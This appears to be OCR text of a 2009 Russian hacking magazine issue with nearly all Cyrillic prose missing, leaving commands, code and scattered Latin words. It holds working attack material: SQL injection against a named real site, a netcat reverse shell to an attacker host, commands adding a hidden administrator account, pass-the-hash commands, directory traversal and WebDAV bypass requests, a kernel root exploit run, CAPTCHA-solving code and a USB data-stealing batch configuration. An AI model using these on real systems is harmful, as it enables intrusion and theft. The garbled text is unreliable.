Transmission (http://www.transmissionbt.com),
- Clutch
(http://code.recurser.com/wiki/clutch/About).
- Deluge
(deluge-torrent.org), .
,

, ,
, Python.
RemoteNotify,

Jabber ID.
Torrent
Jabber-. add http://link/link Deluge
. IM- ,
, , , , Jabber.

RSS

.torrent- RSS-

:
UTORRENT

. -,
,
Scapy
. RSS- ,
.
.
RSS- - ,
.
-.
, HTTP-. uTorrent,
URL : http://
:@--.com/rss.php.
cookie ( UID
) :
http://--.com/rss.php:COOKIE:uid=01;pas
s=qwertysdf354scdfg2
uTorrent, , RSS
Downloader ( Ctrl-R).
,
, , , ? *,
. ,
( ),
.. .
,
(DVDRip, HDTV ..).
-. -
: ,
RSS-. ,
? -
Yahoo Pipes (pipes.yahoo.com).

(RSS-, HTML-),
,

RSS-. ,
,
. ,
,
. , 110
z (PDF- ).


. . ,

036

X 06 /126/ 09

>> pc_zone

YAHOO-

torrent- ,
.torrent-. ,
Perl-,
,
. ,
,
,

FTP.
,
uTorrent.

.torrent .
,
,
, . ,
uTorrent
.torrent.loaded.


,
BitTorrent, , .

p2p- , ,
(!) .
, , ,

TRANSMISSION
. ,
.
, .
,
, .
, (,
VPN-) (
Tor).
.

RC4 .
(Protocol Encryption),
BitComet 2005 ,

.
uTorrent,
: , ,
..
. ,
.
, uTorrent
. z

uTorrent

, -. , bt.enable_tracker. , - .
, , , . -
URL: http://.ip:/announce.
- , .
uTorrent -,
. , , ,
, , .
- WebUI . ,
uRemote (uremote.blogspot.com/), uTorrent Mobile
(apps.junkship.org), - Multi-user Webui Shell
(trac.utorrent.com/trac/wiki/Webui-Shell).

X 06 /126/ 09

INFO

info
,
-,

#114 z. PDF-

.
-

,
TorrentFlux
(torrentflux.com).
-,

PHP


LAMP
.

uTorrent,

. ,

- Mac
OS,

Wine.

037

>>

Easy Hack
R0ID
/ R0ID@MAIL.RU /

SKVOZ
/ KOMAROV@ITDEFENCE.RU /

M0R0
/ M0R0@INBOX.RU /

:
.
, ,
, www.vkontakte.ru :). , ,
- :, : ? ,
.
MailWok,
,
. ,
:

(mail.ru, rambler.ru,
yandex.ru, etc)

, , :
1.

: IRC-

:
IRC, ,
. -
. , , IRC-
, ,
.
. ,
, Invite
mirc script by elimS. . ,
:

038


2. :,
3.
4.
5. ( )
6. ,
,
7.

! , :
1.
2.
3. ,

, , . ,

www.vkontakte.ru. ,
,
.
P.S. MailWok, ,
.

:

(
)

:)

:
1.
2. mirc- (aka
<Alt+R>)
3. (
"Invite mirc script by
elimS")

X 06 /126/ 09

>>
. :
1.
2. :
1) ,
2) (1 = 1 ). ,
, 2
.
3) ,

( )
4) , ( :))
5) - -
6) - ,

, ,
.

: ICQCHAT

:
z
ICQChat.
, . ,
.
:
1.
2.
3. /

:).
1. , :

jimbot.xml
: : <entry key="http.
user">admin</entry>
: <entry key="http.
pass">admin</entry>

2. . :


jhttpserver.properties
: port=8888

3. , :

jimbot.xml
: key=main.StartHTTP>true<

ICQChat

true, false

.
:
: 5
: 1000
: 500
: 20
: 660000
: 5
(): 10
(): 20
: 10000
:)

. ,
.

: 3PROXY SOCKS5

:
:).
- 3proxy.

:

3proxy

# cd /usr/ports/net/3proxy/
# make install clean
X 06 /126/ 09

039

>>
:
# cp /usr/local/etc/3proxy.cfg.sample /usr/local/etc/3proxy.cfg

:
# mkdir /var/log/3proxy

3proxy.cfg -
( DVD).
, . 3proxy :
# /usr/local/etc/rc.d/3proxy start

- -
:).

, /dev/null :).

:
XSS,

:
,
.
ha.ckers.org/xss.html
(ross Site Scripting Cheat Sheet) -
.
foreign char sets. :
1. HTML-, 256
:
<%@ page language="java" contentType="text/html;
charset=UTF-8"
pageEncoding="UTF-8"%>
<%@page import="org.apache.commons.lang.StringEscapeUtils" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=UTF-8">
<title>XSS-</title>

:
NMAP

:
, nmapsql (sourceforge.net/projects/
nmapsql). MySQL
. , ,
. Unix/
Linux-, .
1. ~/nmapsql.rc .
, .
server=localhost, db=nmaplog, user=nmap,
passwd=scanamanga

</head>
<body>
<%
for(long i=0; i< 0x100; i++)
{
long lt = 0x3C;
long gt = 0x3E;
long order = i << 8;
long LT = order | lt;
//out.println(Long.toHexString(LT) + " : ");
long GT = order | gt;
//out.println(Long.toHexString(GT) + "<BR>");
String theScript = (char)LT + "script" + (char)GT + "alert("
+ i + ");" +(char)LT + "/script" + (char)GT;
out.println( theScript + "<br>");
}
%>
</body>
</html>

2. . ,
,
, .
.

TARGETS (IP
address, hostname O)
SCANNERS ,
nmapsql. ,
RUNLIST user ID, Nmap. , /etc/passwd.
PORTSTAT
(open/close/filtered)
HOSTSSTAT , , ..

:
mysql> select target_ip, d, t, port, protocol,
-> state, runid from portstat
-> order by target_ip, d, t ;

2. nmap :
nmap -A --mysql --runid 100 192.168.10.1/24

3. , :

040

+---------------+------------+----------+--------+---------+--------+-------+
| target_ip
|d
|t
| port | protocol | state | runid
|
X 06 /126/ 09

>>
+---------------+------------+----------+--------+---------+--------+-------+
| 192.168.10.0 | 2003-12-14 | 10:00:37 |
80 | tcp
| open
| 100 |
| 192.168.10.1 | 2003-12-14 | 10:00:37 |
21 | tcp
| open
| 100 |
| 192.168.10.1 | 2003-12-14 | 10:00:37 |
23 | tcp
| open
| 100 |
| 192.168.10.1 | 2003-12-14 | 10:00:37 | 80 | tcp
| open | 100 |

nmapsql

:

ACTIVEX
AUTOMATION SQL SERVER 2005

:
SQL Server
.
SQL-, SYSTEM.
xp_cmdshell,
, sp_oacreate/sp_oamethod OLE-, .
sysadmin. , sa, .

xp_cmdshell

3. xp_cmdshell:
exec sp_configure 'xp_cmdshell',1

4. OLE Automation:

, Microsoft
. -

sp_configure 'Ole Automation Procedures',1

, SQL Surface Area


Configuration. Microsoft

5. :

. sysadmin,
T-SQL.

reconfigure

1. :
, ;,

exec sp_configure 'show advanced options',1

!
.

2. :

P.S. SQL Server 2000 xp_cmdshell ,


reconfigure

:
,
LM/NTLM

:
LM/NTLM ,
- :). ,
SamInside
( NT
).
. , NTLMv1 NTLMv2
M$, ,

. ,
,
, (
).
winexe psexec (foofus.net/jmk/
X 06 /126/ 09

sp_addextendedproc.

passhash.html). GNU TLS


1.3. winexe SMBHASH LM:NTLM,
.
, 2 (!) .
$ export SMBHASH="f0d412bd764ffe81aad3b435b51404ee:209c6174da
490caeb422f3fa5a7ae634"
$ ./winexe -U Admin \\192.168.0.1 "ipconfig"

ipconfig whoami

PSH Toolkit
msvctl. PSH Toolkit

- lsasrv.
dll,
, msvctl
. z

041

>>

SKVOZ

OBZOR KSPLOITOV
. , !
( ) . . , , .

01


MICROSOFT IIS 6.0
WEBDAV

>> Brief
,
. WebDAV (Web-based Distributed Authoring and Versioning)
IIS, WEB- Windows Server. WebDAV HTTP
:
PROPFIND
XML. (
)
PROPPATCH
MKCOL ( )
COPY URI
MOVE , ,
LOCK . WebDAV (shared)
UNLOCK


WEB-.
HTTP- (
http xakep.ru/magazine/xa/117/038/1.asp). ,
WEB- URI Unicode-.

>> Targets:
Microsoft IIS 6.0 WebDAV
>> Exploit
, c:\inetpub\
wwwroot\secret\. , inetpub\wwwroot\ , IIS . secret.zip,

042

.
: secrethost.ru/secret/secret.zip.
GET- :
GET / %c0%af/secret/secret.zip HTTP/1.1
Translate: f
Connection: close
Host: secrethost.ru

, URI / (%c0%af),
WebDav-. WEB- ,
WebDav.
:
GET /sec%c0%afret/secret.zip HTTP/1.1
Translate: f
Connection: close
Host: secrethost.ru

, , , .
- ? PROPFIND
- . , , UNICODE, , ?
PROPFIND (msdn.microsoft.com/en-us/library/aa142960(EXCHG.65).
aspx) BPROPFIND (msdn.microsoft.com/en-us/library/
aa142725(EXCHG.65).aspx) ,
.
secret:
PROPFIND /sec%c0%afret/ HTTP/1.1
Host: secrethost.ru
User-Agent: Mozilla
Connection: TE
TE: trailers
Depth: 1
X 06 /126/ 09

Content-Length: 288
Content-Type: application/xml
<?xml version=1.0 encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

>> SOLUTION

,
WebDav. (Add value)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\
Parameters:
Value name: DisableWebDAV
Data type: DWORD
Value data: 1

IIS .
WebDAV IIS
Lockdown. - Microsoft (microsoft.com/technet/security/tools/
locktool.mspx).
IIS lockdown tool Microsoft,
- (IIS 4.0 5.0) ,
, ,
.
.

02


GNU/LINUX KERNEL
2.6.29

>> Brief
ptrace_attach () [kernel/ptrace.c]
current->cred_exec_mutex task->cred_
exec_mutex, ptrace ()
exec () . :
175 int ptrace_attach(struct task_struct *task)
176 {
177
int retval;
178
unsigned long flags;
179
180
audit_ptrace(task);
181
182
retval = -EPERM;
183
if (same_thread_group(task, current))
184
goto out;
185
186
/* Protect execs credential calculations
187
against our interference; SUID, SGID and LSM
188
creds get determined differently under ptrace */
189
retval = mutex_lock_interruptible(
&current->cred_exec_mutex);
190
if (retval < 0)
191
goto out;
192
193
retval = -EPERM;
194 repeat:
...
X 06 /126/ 09

>>

230 bad:
231
write_unlock_irqrestore(&tasklist_lock,
flags);
232
task_unlock(task);
233
mutex_unlock(&current->cred_exec_mutex);
234 out:
235
236 }

return retval;

189 233 ptrace_attach


(
, ). -
cred_exec_mutex
, , - SUID.

>> Exploit
milw0rm.com/exploits/8678
:
# id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),
20(dialout),24(cdrom),25(floppy), 29(audio),30(dip),44
(video),46(plugdev),107(fuse),109(lpadmin),115(admin),
1000(matthew)
#
gcc exploit.c -o exploit
# uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629
SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
# while `/bin/true/`;do ./exploit;done
* [... much scroll removed, go make coffee, get a job,
do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remountro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,node
v,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,no
dev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)

BUGZILLA

043

>>

WEBDAV



* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.
gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
# id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialo
ut),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(ad
min),1000(matthew)

, .

>> Targets:

rPath
rPath
rPath
Linux

rPath Linux 2
Appliance Platform Linux Service 2
Appliance Platform Linux Service 1
kernel 2.6.29

>> Solution
, GIT (git.kernel.
org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blobdiff;f=kernel/ptrace.c;
h=0692ab5a0d672341000d1697d7c308c566060fb4;hp=dfcd83ceee3b24632
6cbec2a6eadb27abdba7823;hb=cad81bc2529ab8c62b6fdc83a1c0c7f4a872
09eb;hpb=ce8a7424d23a36f043d0de8484f888971c831119).

03

MOZILLA FIREFOX
MEMORY
CORRUPTION

>> Brief
Marc Gueury Daniel Veditz, CVE (CVE-2009-1313).
@nsTextFrame::ClearTextRun().
50 /* rendering object for textual content of elements */
...
3494 void
3495 nsTextFrame::ClearTextRun()
3496 {
3497 // save textrun because
ClearAllTextRunReferences will clear ours
3498 gfxTextRun* textRun = mTextRun;
3499
3500 if (!textRun)
3501
return;
3502
3503 UnhookTextRunFromFrames(textRun);

044

3504 // see comments in BuildTextRunForFrames...


3505 // if (textRun->GetFlags() & gfxFontGroup::TEXT_
IS_PERSISTENT) {
3506 //
NS_ERROR("Shouldnt reach here for now...);
3507 //
// the textruns text may be referencing a DOM
node that has changed,
3508 //
// so wed better kill this textrun now.
3509 //
if (textRun->GetExpirationState()>IsTracked()) {
3510 //
gTextRuns->RemoveFromCache(textRun);
3511 //
}
3512 //
delete textRun;
3513 //
return;
3514 // }
3515
3516 if (!(textRun->GetFlags() &
gfxTextRunWordCache::TEXT_IN_CACHE)) {
3517
// Remove it now because its not doing
anything useful
3518
gTextRuns->RemoveFromCache(textRun);
delete textRun;
3519
3520 }
3521 }

layout/generic/
nsTextFrameThebes.cpp. , .
textRun mTextRun (3498).
, textrun NULL (3500).
, textrun . ,
, .
. , mTextRun
, (3519). -
Mozilla :
+ // Set when this text frame is mentioned in the
userdata for a textrun
+ #define TEXT_IN_TEXTRUN_USER_DATA 0x40000000
+

>> Exploit
.
<html><head><title> Bug 489647 - New 1.9.0.9 topcrash
[@nsTextFrame::ClearTextRun()]</title></head>
<body>
<div id=a style=white-space: pre;>
m</div>
<script>
function doe() {
document.getElementById(a).childNodes[0].
X 06 /126/ 09

>>

ARTFORMS

LINUX
( ). ,
, ,

splitText(1);
}
setTimeout(doe, 100);
</script>
</body>
</html>

>> Targets
Mozilla Firefox 3.0.10
>> Solution
Firefox .

04

PHPMYADMIN

>> Brief:
, Phpmyadmin
!
,
:
X 06 /126/ 09

1 <?php
...
10 class ConfigFile
11 {
12
/**
13
* Stores default PMA config from config.default.
php
14
* @var array
15
*/
16
private $cfg;
...
259
/**
260
* Creates config file
261
*
262
* @return string
263
*/
264
public function getConfigFile()
265
{
266
$crlf = (isset($_SESSION['eol']) && $_
SESSION['eol'] == 'win') ? "\r\n" : "\n";
267
$c = $_SESSION['ConfigFile'];
268
269
// header
270
$ret = '<?php' . $crlf
...
279
// servers
280
if ($this->getServerCount() > 0) {
281
$ret .= "/* Servers configuration */$crlf\$i
= 0;" . $crlf . $crlf;
282
foreach ($c['Servers'] as $id => $server) {
283
$ret .= '/* Server: ' . $this>getServerName($id) . " [$id] */" . $crlf
284
. '$i++;' . $crlf;
285
foreach ($server as $k => $v) {
286
$ret .= "\$cfg['Servers'][\$i]['$k']
=
287
. var_export($v, true) . ';' . $crlf;
288
}
289
$ret .= $crlf;
290
}

045

>>

phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revis
ion=12342.
phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revis
ion=12348.

05

JOMMLA, . E
JOOMSCAN

291
$ret .= '/* End of servers configuration */'
. $crlf . $crlf;
292
}

, getConfigFile() .
, $ret PHP. 281 , (/* Server:
<getServerName()> id */). : , $id
,
(267). ,
bleh */ <?php echo date(); ?> /*, /* Server: <getServerName()> bleh */ <?php echo
date(); ?> /* */.

>> Targets
phpMyAdmin 3.x ( 3.1.3.2.)
>> Solution
preg_replace():
foreach ($c['Servers'] as $id => $server) {
+ $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
$ret .= '/* Server: ' . $this->getServerName($id) . "
[$id] */" . $crlf

:
DIRECTORY TRAVERSAL


ZERVIT
WEBSERVER 4.0

>> Brief:
Directory Traversal. Path Traversal.
, ,
, ACL-.
, ,
Web-.
URL
,
Web-. ,
Web-. Web-
, web document root CGI root. ,
, ,
Web-.
, , URL
../ , ,
. Web-
, , , Unicode (..%u2216
..%c0%af).
(..\) Windows-, URLEncode (%2e%2e%2f)
URLEncode (..%255c).
Web-
, CGI-.
,
.
, CGI- .
.
,
%00, . ,
IDS-, (/../../../)
. ,
, , ..\..\, ../..\../..\,
.
WEB- PROPFIND

46
046

X 06 /126/ 09

>>

3. httpd.conf WEB- Apache (+ ).


../../../../../../../../../Program Files\Apache Group\
Apache\conf\httpd.conf
../../../../../../../../../Program Files\Apache Group\
Apache2\conf\httpd.conf
../../../../../../../../../Program Files\xampp\apache\
conf\httpd.conf

WEBDAV
(WEBDAV.ORG/GOLIATH/DAVEXAMPLE.HTML)

2e%2e%2f ../
%2e%2e/ ../
..%2f ../
%2e%2e%5c ..\
%c1%1c / (UTF-8)
%c0%af \ (UTF-8)

4. .
../../../../../../../../../../Program Files\Apache
Group\Apache\logs\access.log
../../../../../../../../../../Program Files\Apache
Group\Apache\logs\error.log

ettee (antichat.ru/
thread49775.html). , milw0rm,
Memory Corruption :
import socket

>> Exploits
GET-:
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en)
Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/
xhtml+xml, image/png, image/jpeg, image/gif, image/xxbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers

:
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft
Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT

, boot.ini, :
1. - Cpanel /var/cpanel/
cpanel.config.
2. PHP PHP\php.ini.
../../../../../../../../../WINDOWS\php.ini
../../../../../../../../../WINNT\php.ini
../../../../../../../../../apache\php\php.ini
../../../../../../../../../xampp\apache\bin\php.ini
X 06 /126/ 09

host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
#
WEB- POST-
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter to quit...')

, ,
.
:
Http.h:
69 struct http_data{
70
SOCKET sck;
71
char file[512];
72
char keep_alive;
73
char data[2048];
74
char user_agent[512];
75
unsigned long ptr;
76 };
Http.c:
13 void parse_http(struct http_data *msgs)
14 {
...
21
if(strcmp(ch,"GET")==0){
...
24
ch=get_word(msgs);
25
strcpy(msgs->file,ch);

strcpy
! .z

047

>>

M0R0

MUXX

/ M0R0@INBOX.RU /

/ MUXX@BK.RU /

RDP

>>

, .

. ,
web- .
SQL . ,
RDP !
,

. URL.
- URL - ,
, .
URL ,
: , ,
, . ,
.
,
id
... , ,
, .
, - ,

048

. , insite:ism.
ws, Search ,
?
10000 Google
.
, ,
, .

1,

, . ,
,
. .

http://www.ism.ws/Applications/Forms/
FormDisplay.cfm?FormID=8464.

, . -
ColdFusion, ,
SQL-,
(SQL Server), .
, ,
ColdFusion,
, , . ,
.

2,

. , ,
-, X 06 /126/ 09

>>

. Microsoft, , -
, . , ,
SQL Server. ,
, , . !
:
http://www.ism.ws/
Applications/Forms/FormDisplay.
cfm?FormID=8464+or+1=(select+@@
version%2bchar(58)%2bdb_
name()%2bchar(58)%2bsystem_
user%2bchar(58)%2b@@servername)--

:
[Macromedia][SQLServer JDBC Driver]
[SQLServer]Syntax error converting
the nvarchar value Microsoft SQL
Server 2000 - 8.00.2050 (Intel X86)
Mar 7 2008 21:29:56 Copyright (c)
1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.0
(Build 2195: Service Pack 4) :RDCMSISM-Core:rms:ISMSQL01 to a column
of data type int.

RDCMSISM-Core. , : CMS
,
,
.
. .
Microsoft
. ,

, row_number 2000 .

. TOP ,

. ,
X 06 /126/ 09

, . ,
, :
,
.
: ,
URL
.
.
.

- .
, ,
(
). 9. !
ES_LoginInfo
(RDCMS-ISM-Core : dbo : ES_LoginInfo :
Password). -,
, - .
, .
:
EntityID, Username Password. ,
,
.

. , ,
, ,
, - CMS (SHA-1, SHA-512,
MD5)
(iMIS). , ,

8 .

3,

SM_
Sites,
FTPPassword. ,
FTPUserName
FTPServer. , ,
ftp.rd.net
ftp2.rd.net. rd.net

, CMS, ,
Results Direct.
, ,
ftp .
ism.ws.prod.code
, , ,
. FTP
.
.
FTP ,
,

.

4,

FTP, ,
.
, ,
web-. , -shell,
.
PHP , , Perl
. , :
ColdFusion.
(
), -
. , Web-shell
.
,
.
, ,
.
,
.
,
, .
. , SYSTEM,
.
.

049

>>

FTP

5,

3389, .
.

Web-shell , , , ,
. . Total
netcat FTP. netcat
: nc.exe l p 1234.
cmd /c nc.exe m0r0superdedik.com 1234 e cmd.
!
, , .
99- , - ,
- . Netstat


?
.
, ,
. , , -.
, .
1. MySQL. limit [offset, ]rowcount.
rowcount ( 1) , offset. , !
2. Oracle. rownum. ,
rownum , , , rownum=n. .
: select fieldname from
(select a.fieldname, rownum r from (select fieldname
from tablename) as a where r=<offset>)
3. SQL Server 2005. : row_
number(). : select field1, field2 from (select
row_number() over (order by a.field1) as r, a.field1,
a.field2 from (select field1, field2 from tablename)
as a) as b where r=<offset>.
4. SQL Server 2000. : TOP.
:
offset, TOP <offset>
,
.
. ,
!

050

net user st password /add


net localgroup Administrators st /add

mstsc, , , . NMAP ,
80 25 . , 3389 . ,
:
VNC;
PPTP;
SSH.

6, ,

. netcat ,
,
-

VS
, , :
;
.
, , ,
, Accunetix. ,
XSpider, . ,
, .
,
Google.
, Google
,
. . ,
. ,
.

X 06 /126/ 09

>>


RDP

. ,
VNC. VNC, , (
TightVNC, ):
1. winvnc.exe wm_hooks.
dll.
2. VNC-.
winvnc.exe install
net start "VNC Server"
3. .
4. -.
winvnc.exe connect <host>:<port>.

, ,
. , ,
SYSTEM. ,
, , ,
. Metasploit windows/vncinject/
reverse_tcp ( ),
. VNC

. ,
VNC, RDP. .
PPTP
PPTP-
.
,
. procmon

.
, . Microsoft .
, .
, , ,
C:\Documents and Settings\
All Users\Application Data\Microsoft\Network\Connections\
Pbk\rasphone.pbk, , ,
Dial-up VPN-.
(
RRAS) X 06 /126/ 09

rasphone.pbk . :
rasdial connection_name user password
route add 0.0.0.0 mask 0.0.0.0
remotehostgateway

,
.
:). ,
, ,
. GRE.
,
. , ,
SSH. , , , z.
, .

:
SSH-
SSH-

, , ,
XXI SSH-,
. , ,
. , ,
putty. putty , .
, putty
. ,
. ,
, , putty
. , Quest PuTTY
0.60_q1.129. , , !
plink.exe :

DVD

dvd

web-shell
ColdFusion.

HTTP://WWW
links



:
acunetix.com/
vulnerability-scanner/
Accunetix Web
Vulnerability Scanner.
ptsecurity.ru/xs7.asp
Xspider.
cirt.net/nikto2
Nikto.
sensepost.com/
research/wikto
Wikto.

plink.exe -nc m0r0superdedik.com:22 -batch


-pw password -R 3390:127.0.0.1:3389 -L
3390:127.0.0.1:3390 -l st -auto_store_key_in_
cache m0r0superdedik

051

>>

INFO

info

.

(
),
SIPT. ,
, ,
.
forum.antichat.
net/threadnav249181-10.html.


SSH- !
mstsc localhost:3390.
Windows 2000. c net user
. , -- , , .

7,

, ,
web-shell SSH
.
ColdFusion-
.
DVD.
header.cfm, ,
, CMS.
, *.cfm-
, RDP.

052

<form action="http://www.ism.ws/about/
MediaRoom/RequestForm.cfm method="POST">
<table>
<tr><td>IP- :</
td><td><input type="text" size="20" name="ip"
value="m0r0superdedik.com></input></td></tr>
<tr><td> SSH:</td><td><input type="text"
size="20" name="port" value="22"></input></
td></tr>
<tr><td> :</td><td><input
type="text" size="20" name="login"
value="st"></input></td></tr>
<tr><td>:</td><td><input type="text"
size="20" name="password" value="password"></
input></td></tr>
<tr><td></td><td><input type="submit"
value="GO!"></td></td>
</table>
</form>

,

CMS, . CMS .
SM_Sites
, FTP .
, , ,
iMIS ( 120 ). ,
. , Google
inurl:navItemNumber 12000
. ,
,
.
( _xCort_
torrents.ru).
: !. z
X 06 /126/ 09

>>

S4AVRD0W
/ S4AVRD0W@P0C.RU /


CAPTCHA-

>>

captcha -.
captcha- . , . captcha- .
CAPTCHA (Completely Automated Public Turing
test to tell Computers and Humans Apart, ) .
,
-
-,
, , ,
..

. (1912-1954)
. ,
, , .
.
, ,
, , .
.
,

054

,
.

captcha-
, ,

.
,
, :
, ;
, -
( rapidshare) .

, .
,

(90 + 72 = ?).


CAPTCHA-

captcha-.




captcha-.

.
1. .
OCR ( )
captcha-. ,

, .
Adobe Fine Reader captcha (
).

. ,
.
X 06 /126/ 09

>>



.

OCR. UC Berkeley Computer
Vision Group, PWNtcha CAPTCHA Killer.
,
web-,

.
CAPTCHA Killer , , ,
API,

. PHP :
...
//
$fields = array('api_key' =>
$api_key,'method' => 'upload_
captcha', 'captcha_url' =>
'http://non/');
$files = array(array('name'
=> 'file','type' => 'image/
jpeg','file' => $hash.'.jpg'));
$response = http_parse_
message(http_post_fields("http://
www.captchakiller.com/api.php",
$fields, $files))->body;
...
//
$fields = array('api_key' =>
$api_key,'method' => 'get_
result','captcha_id' => $captcha_
id);
$response = http_parse_
message(http_post_fields("http://
www.captchakiller.com/api.php",
$fields, $files))->body;
...

80%
.
(
)
10%.

X 06 /126/ 09

20 .


.
CAPTCHA Killer 20
.
. , . (

CSRF)
,

,
HTML-.
, , , ,
.
OCR , , Yandex

.


.
, ,
.
3.
.
?
captcha- - ,

(
). . ,
( ,
,
)
.

CAPTCHA KILLER ,
API

.
Google.
Yandex .
Google
: 20% .
, ,

. ,
... ,
,
, , .
2. .
. ,

, ,
.
.
.
,

, .
,

-:
...
my $key = int (rand 10000);
my @symbols = ('0'..'9');
for ( 1..5 ) {
$q .= $symbols[rand @symbols];
}
my $hash = sha1_hex( uc($q), $key
);
...

? ,
(salt) ,
. ,
, .

055

>>

CAPTCHA,

(rainbow
tables).
captcha-
,
.
4. .
captcha-, web-
. :

;
.
,
captcha
.
web- (, cookies).
,

.

.

, .

056

GOOGLE CAPTCHA KILLER

OCR

captcha-.
,
,
captcha-,
-
.
. , -


,

( ,

). ,

(, ,
),
!

X 06 /126/ 09

>>

OCR

INFO

info



captcha.


CAPTCHA-

5. , Web. ,
,
web-. ,
captcha,

. , SQL Injection.
.
, web-
.
web-
,
. ,
,
SQL Injection
. , ,
.
captcha ( ).
captcha-,


captcha-.


. ,
.
-,

. -, .
. ReCAPTCHA,
.
, Facebook,
Bash.org.ru .

X 06 /126/ 09



. ,
.
,
CAPTCHA.
captcha-
. , . ,


, , - , . z


OCR
CAPTCHA
,
Yandex, Google .



captcha-.

HTTP://WWW
links
caca.zoy.org/wiki/
PWNtcha
captchakiller.com
securitylab.ru/
contest/239642.php

057

>>

a
l

058

X 06 /126/ 09

>>

A IL .R

K2@M
URO
IK _ Y
R
U
Y
/


..
.

. .

/
E_N

V_M_
TOR
/ DOC

,

z ,
U3- .
,
, .
.
. ,

,


. ,
,

2 .
. U3-
- 4
!
,

, , , ,
... ,
,

X 06 /126/ 09

Kingston,
Vista.
.



, .
,
,
.


,
,
.
.
.
Winrar-, ,
.
ini-
.
,
-.
, ,
iso- ,

,
. Kingston,
, ,
10
.
,
LaunchU3- .

, .

Win32. ,
bat-.



,
. ,


. , , :
md c:\\

059

>>

CMD

HTTP://WWW
links
-,

. 1, 2, 4
16 !
nix.ru
digitec.ru
mobiloff.net
ixbt.com/
storage/flashdrivesp17.shtml,
- ,
U3.


, . , ,
- .
, 1251.
chcp 1251
md c:\\

. , ,
.
,
- :
rem

rem #
@set target=194.67.57.26
chcp 1251
color f0
title
chcp 866
:m1
@set pr==1
@for /F "usebackq tokens=1,2,3,4,5,6,7*
delims= " %%1 IN ('ping %target% -n 1')
DO (echo %%4 %%5 %%6|findstr "=&&@
set pr=%%6)&(echo %%1 %%2 %%3 %%4 %%5
%%6|findstr " . ."&&@set
pr=disconected)
@for /F "usebackq tokens=1,2,3* delims==
" %%1 IN (`echo %time%`) DO @set d_
t="Date_%date% time_%%1 ping_%pr% & title
Date_%date% time_%%1 ping_%pr%
cls
@rem #
,
@rem #@echo %d_t% >> c:\realtime_log.txt
@echo %d_t%
@rem #

060

@if %pr%==disconected @start calc&&pause


@goto m1

, .
-
. ,

. , ,

.
FOR,
,
.
, DVD
,
,
!
, - ,

, .
, , ,
. ,
.
, .
Windows
. ,
.

,
. ,
,
, , ,
.

-

,
. ,
, . , IF
,
X 06 /126/ 09

>>

WindowsXP Home,
WindowsXP Pro
. ,
,
.

,
,
,
. , , .
, ,
Windows2000 ,
USB. ,
, , .
, , ,
.
.
! !

. . ,
, ,
. ,
- . ,

. ,
.
.
, : ,
.
, .

,
. .
, , ,
.
,
, , , ,
Enter.
, .
.

X 06 /126/ 09

- RAR-
JUMPER.BAT.
. ,
, , ,
- ,
, ! ,
.
WARBOT.bat, , :
set make_tir_in_allusers_autorun=1 (0\1)
set make_tir_in_user_autorun=1
(0\1)
set stealth_konsol=0 ?
(0\1)
set stealth_histiry_ie=1 IE? (0\1)
set attack_for_guest=1
? (0\1)
set stealth recents=1
? ( ) (0\1)
set stealth_system_info=1
? (0\1)
set stealth_md5_passwords=1
5- ? (0\1)
set type_of_file_for_stealth=.doc .txt
,
set type_of_file_for_filtration=.lnk .LNK
.mp3 .wma .vob .wav .mid .midi .mp4 .avi .ogg
.mpeg .mpg .cda %usbdisc% winword WINWORD

WARNING
warning
!

!
,
!

DVD
dvd

-,
,


,
Win32
,
.

.

!
, - . U3- mp3! ,
http://flashboot.ru/index.php?nam
e=Files&op=cat&id=6&pagenum=2,
.
;). .

061

>>

U3-
set no_use_LanMod_for_Radmin=0 ?
set use_only_radmin=0 ?
set no_create_message=0
set no_display_message=0 ?

,
:



Cookies cookies .jpeg .jpg .bmp .gif .pic .pict .ico
,
